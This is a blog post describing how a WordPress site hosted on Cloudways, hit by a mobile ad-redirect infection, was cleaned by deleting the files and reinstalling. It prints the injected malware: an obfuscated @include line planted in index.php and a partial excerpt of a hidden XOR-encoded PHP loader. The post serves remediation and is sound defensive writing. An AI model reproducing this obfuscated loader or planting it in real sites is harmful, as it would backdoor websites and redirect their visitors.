How to Clean a Website After It Gets Infected with a Virus on CloudWays

Today, I encountered a client's website hosted on a Cloudways server. The WordPress site automatically redirects to third-party advertising websites when accessed via mobile, which is a clear symptom of a virus infection. This article documents how to clean this ad-redirect virus.

The principle is similar to previous ad-redirect viruses: they exploit vulnerabilities in plugins or WordPress itself to upload malicious files to the server. For example, in the index.php file, we discovered this string of encrypted code.

<?php
/*85ba2*/

@include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti");

/*85ba2*/

The file points to a file named .c963ccee.oti, containing partial content as follows:

<?php
$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;
$o8dk17mz = "";
$o8dk17mz .= $ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E");
$o8dk17mz .= $ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");

The code is too long to decrypt completely. However, based on Naiba's experience, it's clear this is a virus file without needing decryption. Normal WordPress program files are open-source and do not contain encrypted code.

Besides this one, there are other interfering files in the folder, which won't be listed one by one here.

Once the infection method is analyzed, the solution is simple: delete the virus files and replace them with clean ones.

The simplest method is to delete all WordPress files and reinstall. Of course, files under the uploads directory must be manually preserved; otherwise, all website images will be lost after reinstallation.

Cloudways is a managed VPS, so users do not have the highest permissions. Using SFTP or SSH, you still lack the permission to delete virus files, so you need to contact customer support for assistance.

Finally, the steps to handle a virus-infected website on Cloudways:

1. Back up the infected website data for reference;
2. Delete all files and folders except the wp-content/uploads folder (requires contacting customer support for deletion, as permissions are insufficient).
3. Re-download the WordPress installation package and install the WordPress website;
4. Reinstall the previous Theme and Plugin.

After completing these operations, the virus files will be gone. If you can't handle it, you canpay Naiba to handle it。